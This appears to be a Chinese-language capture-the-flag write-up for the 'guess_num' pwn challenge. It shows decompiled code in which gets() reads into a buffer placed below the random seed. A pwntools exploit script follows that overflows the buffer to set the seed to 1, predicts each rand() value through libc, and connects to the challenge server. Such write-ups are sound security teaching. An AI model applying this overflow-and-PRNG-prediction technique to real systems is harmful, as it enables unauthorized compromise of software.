PWN攻防世界guess_num

首先，我们先查看一下文件属性和防护。

防护基本上全开了。将文件丢入IDA。

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v4; // [rsp+4h] [rbp-3Ch] BYREF
  int i; // [rsp+8h] [rbp-38h]
  int v6; // [rsp+Ch] [rbp-34h]
  char v7[32]; // [rsp+10h] [rbp-30h] BYREF
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v4 = 0;
  v6 = 0;
  *(_QWORD *)seed = sub_BB0();
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:");
  gets(v7);
  srand(seed[0]);
  for ( i = 0; i <= 9; ++i )
  {
    v6 = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v4);
    puts("---------------------------------");
    if ( v4 != v6 )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();
  return 0LL;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

用IDA64打开，找到main函数，F5反编译，可以分析得出其基本逻辑为：首先从输入gets一个姓名，然后用种子初始化随机数发生器，对生成的随机数进行处理，然后输入一个整数，将随机数处理后的值与输入数值进行比较，如果10轮比较都相同则成功，随即调用sub_C3E()。该函数会cat flag。
编写Python脚本：

from pwn import *
from ctypes import *

context(os='Linux',arch="amd64",log_level="debug")
content = 0 

def srand():

	lib = cdll.LoadLibrary("libc.so.6")
	lib.srand(1)
	
	for i in range(10):
		number = str(lib.rand() % 6 + 1)
		day3.recvuntil("Please input your guess number:")
		day3.sendline(number)
def main():
	global day3
	if content == 1:
		day3 = process("guess_num")
	else:
		day3 =remote("111.200.241.244",49182)
		
	payload = b'a' * (0x30 - 0x10) + p64(1)
	
	day3.recvuntil("Your name:")
	day3.sendline(payload)
	
	srand()
	day3.interactive()
	
main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

获得Flag。